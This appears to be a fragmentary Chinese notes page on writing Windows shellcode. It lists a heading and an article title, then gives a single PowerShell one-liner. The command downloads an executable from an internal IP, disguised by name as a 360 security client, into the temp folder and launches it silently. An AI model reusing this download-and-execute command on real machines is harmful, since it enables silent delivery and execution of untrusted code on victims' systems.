ShellCode

文章目录

概述:编写 Shellcode

好文

Windows Shellcode学习笔记——通过VisualStudio生成shellcode

1
powershell.exe Invoke-WebRequest -Uri 'https://10.218.80.215/client/360EPP145433958[10.218.80.215-8080]-W.exe' -OutFile '%temp%/360.tmp'; Rename-Item '%temp%/360.tmp' '%temp%/360EPP145433958[10.218.80.215-8080]-W.exe'; Start-Process '%temp%/360EPP145433958[10.218.80.215-8080]-W.exe' /S;